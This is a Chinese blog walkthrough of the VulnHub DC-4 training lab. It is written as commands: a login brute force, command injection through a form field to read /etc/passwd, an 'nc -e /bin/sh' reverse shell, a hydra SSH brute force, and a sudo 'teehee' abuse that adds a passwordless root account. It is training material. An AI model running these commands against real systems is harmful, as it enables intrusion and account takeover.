Vulnhub靶场 DC系列 DC-4靶场

已于 2024-01-07 10:48:34 修改
阅读量346 收藏
点赞数
文章标签: 安全 web安全 网络
于 2022-12-10 21:59:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdfsergfr/article/details/128268906
版权

目录

引言:

环境搭建:

信息收集:

IP:

端口扫描:

目录扫描: 

漏洞分析:

方法一:bp传值

方法二:反弹shell

hydra密码爆破:

finalshell连接

总结:

引言:

DC-4是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

与以前的DC版本不同,这个版本主要是为初学者/中级用户设计的。只有一个旗子,但从技术上讲,有多个入口点,就像上次一样,没有任何线索。

Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

环境搭建:

  1. 下载地址:DC: 4 ~ VulnHub
  2. 导入VMware
  3. 网络适配器改为NAT模式。
  4. Kali、DC-4靶机

信息收集:

IP:

netdiscover

端口扫描:

nmap -p- -A 192.168.159.143

 

目录扫描: 

dirsearch -u http://192.168.159.143 -e*

漏洞分析:

开放了22、80端口

22-ssh 版本7.4

80-http ngnix  版本1.15.10

访问80端口:

查看页面源码,没有信息

尝试访问目录扫描出的index.php、command.php、login.php、logout.php,均显示为index.php页面。

指纹识别Wapplayzer提取出的信息有:Web服务器:Nginx 1.15.0

页面提示:Admin Information Systems Login 用户名为admin

此时需要密码爆破,利用kali自带的密码字典/usr/share/john password.lst

利用bp 在 submit 位置进行抓包,导入字典 password.lst  进行爆破,选择长度最长的包,

账号:admin

密码:happy 

利用账号密码登录

运行命令:列出文件 磁盘使用 磁盘可用 

三个选项全都运行一下:

对 run 进行抓包,并发送到 repeater 模块

发现三个选项对应三个radio值

方法一:bp传值

我们这里尝试修改radio的值

说明输入命令后台会给出相应的回应,查看pwd、ls等信息

从passwd文件中看到只有root、charles、jim、sam等几个用户可以登录。

cat /etc/passwd

进入home目录下查看文件

ls -l /home

这里我们发现每个文件都由自己的权限,这里我们分别尝试能否查看

ls -l /home/charles

ls -l /home/sam

ls -l /home/jim

我们发现只有jim的文件可以查看,这里我们分别查看一下

cat /home/jim/test.sh

ls /home/jim/backups

出现 old-passwords.bak  我们查看并保存为1.txt

cat /home/jim/backups/old-passwords.bak

 

方法二:反弹shell

 尝试修改命令,添加反弹shell命令

反弹shell网站Reverse Shell Generator (weibell.github.io)

 打开监听

nc -lvvp 4242

添加反弹shell

nc -e /bin/sh 192.168.159.143 4242

获得反弹shell,得到权限

 

cd /home
ls
charles
jim
sam
cd jim
ls
backups
mbox
test.sh
cd backups
ls
old-passwords.bak
cat old-passwords.bak

 获得密码字典,之后我们需要进行密码爆破

hydra密码爆破:

利用九头蛇hydra对三个普通用户jim/sam/charles进行爆破

 hydra -l jim -P 1.txt 192.168.159.143 ssh -vV

 

 发现22-ssh的 账号:jim密码: jibril04

finalshell连接

利用 finalshell 进行ssh连接

连接成功,我们对文件进行查看 

/home/jim 中存在mbox文件打开查看,是一封邮件,查看信息

 进入jim home目录,查看mbox文件,是发给jim的一封邮件的简单描述此时我们想到或许邮件是线索。查找mail

我们得到

用户:Charles

密码:^xHhA&hvim0y

此时我们切换用户

用sudo命令查看charles用户可以哪些具有root权限的命令,发现可以使用teehee命令

sudo -l

 

用户charles可以运行以下命令在dc-4上:(root)NOPASSWD:/usr/bin/teehee

teehee命令可以写入文件内容并不覆盖文件原有内容

使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

su admin

 

一系列查找,我们得到

cd ../
cd ../
cd var
cd mail
cd /root
cat flag.txt

 

总结:

  1. 利用22端口ssh服务
  2. kali password.lst密码爆破 得到admin用户的密码happy
  3. 登录admin用户 bp对radio位置的发送 得到密码字典 old-passwords.bak 
  4. 添加反弹shell 得到密码字典 old-passwords.bak 
  5. 九头蛇hydra 利用密码字典发现ssh的账号:jim密码: jibril04
  6. finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y
  7. 切换Charles用户 用sudo命令查看当前用户哪些命令具有root权限,发现可以使用teehee命令
  8. 使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并记入root组
  9. 查找mail文件 发现flag

sdfsergfr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场实战系列-DC-2实战
weixin_45221204的博客
05-18 1307
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作使用cewl获得目标上存在的用户信息,获得密码字典使用wpscan进行WordPress网站用户名爆破,生成用户字典使用wpscan进一步爆破获得可用的密码和用户。
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 348
Vulnhub靶机:DC-4渗透详细过程
Vulnhub靶场 DC系列 DC-2靶场
sdfsergfr的博客
12-12 703
Vulnhub靶场 DC系列 DC-2靶场
Vulnhub靶场----9、DC-9
七天
03-03 744
Vulnhub-DC9
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1136
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
vulnhub靶场DC-3
qq_58091216的博客
01-08 1228
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
Vulnhub靶场 | DC系列 - DC2
哦 卷!
07-13 871
WPScan能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。提示告诉我们,不能再利用WordPress了~ 但是通过刚该是的namp扫描只扫到了一个80端口(这里注意:默认扫描的端口是常见的 1000个端口)。而因为是WordPress,比较知名的cms,所以可以先尝试一下默认的后台地址,果然,有一个7744端口,并且对应的服务是ssh。
vulnhub靶场实战系列-DC-1实战
weixin_45221204的博客
05-17 1093
DC-1靶场中,使用了metaspolit的基础操作,获取到了CMS的关键配置文件,然后对靶机数据库中admin用户的passwd进行修改,在网站后台获取到了关键信息,最后进行了find提权,并获得所有的flag
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4904
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4471
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 633
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 235
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值